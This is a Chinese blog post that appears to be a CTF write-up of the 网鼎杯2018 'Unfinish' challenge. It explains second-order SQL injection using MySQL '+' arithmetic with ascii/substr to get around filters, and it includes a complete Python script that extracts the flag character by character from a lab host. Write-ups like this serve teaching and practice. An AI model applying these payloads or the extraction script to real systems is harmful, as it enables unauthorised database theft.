[网鼎杯2018]Unfinish 数据库注入‘+‘的利用

最新推荐文章于 2024-04-27 19:27:41 发布
最新推荐文章于 2024-04-27 19:27:41 发布
阅读量702 收藏 1
点赞数 1
文章标签: p2p 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124911240
版权

试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的

随便注册一个登录试试

发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道

但我们输入1'or'1'='1进行前后引号闭合的话

可以发现是有注入点的,执行了我们输入的语句

现在难点来了,语句后面加不了注释符,导致我们之前很多盲注语句使用不了,因为无法闭合后面那个引号,看来又要学一个新知识点了!利用数据库中的'+'运算符

借用别人的数据库实现来唠唠

 可以发现我们可以利用+运算的特性,来进行闭合前后的引号,并且配合ascii及substr函数来进行跑我们所需要的信息,于是我们构造(经过测试我们可以知道逗号以及information都被过滤了,因此直接赌字段名啥的都是flag,感觉越难越不会为难你这种字段名,考的是绕过)

0'+ascii(substr((select * from flag) from 1 for 1))+'0

成功执行,但这次脚本比之前就有点复杂了,每次注册的邮箱都不能一样,记得加format字符串格式化,以及要先对register.php发送post请求进行注册,才能对login.php界面发送登录请求,最后结果是在index.php界面获取

#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time


url = 'http://d898921e-3288-4bbe-88dc-b6c5dc11cd79.node4.buuoj.cn:81/'

m = ''
for i in range(100):
    #payload = "0'+ascii(substr((select database()) from {} for 1))+'0".format(i + 1)
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)#判断每一位ascii码是多少
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')
    html = r3.text
    #print(html)
    soup = BeautifulSoup(html,'html.parser')
    #print(soup.prettify())
    UserName = soup.span.string
    print(UserName)
    if int(UserName) == 0:
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)

这里学到了一个特别强大的模块方法,bs4中的BeautifulSoup

soup = BeautifulSoup(html,'html.parser')
print(soup.prettify())
UserName = soup.span.string
print(UserName)

【Python】BeautifulSoup_风吹我亦散的博客-CSDN博客

python中beautifulsoup的用法_Python中BeautifulSoup的基础用法--附实例_小小仙女儿的博客-CSDN博客

两篇博客讲的很清楚,我们就直接实操看效果

这是我们普通的请求后的text,会发现根据书写习惯的不同很多标签都不是对齐的,看的很不舒服,但是经过 BeautifulSoup(html,'html.parser')python解析为一个对象后

可以看见标签都已经格式化好了,看起来必须方便,但是如果仅仅只有这个功能的话,可是没有什么用,还有最强大的内容查找! soup!

上面博客截取的,可以soup.你所需的标签 来筛选掉你不需要的信息(加了string是直接返回标签内容,不加则一起返回)

这里报错是因为我没有加string导致后面判断识别不出来;

一开始学这个模块的时候我在想为什么还有一个span标签的CTF为什么不输出呢 

从上面博客可以知道它返回的是第一个标签,后面就不会返回了,因此我们要根据情况写脚本

 加了string后过滤成只有我们所需要的用户名回显了,直接跑(保持美观的话还可以加一个strip函数来清除前后的空格)

bingo!又学到一个新方法 

-栀蓝-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CTF 真题] 2018-杯-Web-Unfinish
weixin_43586169的博客
07-22 1067
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
[杯2018]Unfinish
东隅的博客
10-11 742
另外,‘0’+123+'0’这样的注入进去是123,这样可以直接读到内容,这里的数字嘛,我们可以把想得到的东西进行两次hex()就好了,但是两次hex()之后注入数据库的数字变成了小数,这里可以用substr截取,而逗号被过滤了,如何不用逗号进行截取又是新的知识点,学到了:substr(str from 1 for 10) 这个样子。这个跟php的弱类型差不多的,‘’+(我们的盲注)+‘’,我们盲注的结果返回1那这里username就会变成1,反之为0。注册的时候用户名这样写:(注意单引号不能漏)
杯-2018-unfinish解题方法
最新发布
Lemon_miko的博客
04-27 421
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
杯 2018 unfinish
feng的博客
10-29 2674
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
[杯 2018]unfinish.md
09-05
[杯 2018]unfinish.md
Part_CAE_Unfinish.rar
06-15
适用初学者实例的分析案例,有助于童鞋们对有限元分析的了解。
【复习】BUUCTF:[杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1102
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
记录BUUCTF [杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1080
记录BUUCTF [杯2018]Unfinish1解题思路
BUUCTF--[杯2018]Unfinish
qq_46263951的博客
07-14 755
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
XCTF:unfinish(2018杯)(SQL二次注入
羽的博客
09-14 1009
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
三种数据库的 SQL 注入详解
热门推荐
YT的博客
02-25 11万+
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test...
SQL注入
weixin_33696106的博客
12-19 70
一、SQL注入简介   SQL注入(SQL Injection),通过构建SQL代码相关的特殊输入,作为参数传递到服务器,服务器解析并执行SQL语句进而达到攻击者所要的操作。如:通过提交一段数据库查询代码,根据程序返回的结果,获得某些攻击者想得知的数据;或通过控制部分SQL语句,攻击者可以利用数据库的一些特性,直接获取数据库服务器的系统权限。   发生SQL注入的主要原因是程序没有细致地过滤用...
[杯2018]Unfinish&&CTFSHOW内部赛签到题
Je3Z的博客
07-15 1565
CTFSHOW那个是根据[杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
2018years niteen Match unfinish homework
cx1975305741的博客
03-19 427
I am sorry,this is my first day  write boke that one thing is my unfinesh homework. I can't open tensorboard in ubuntu.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值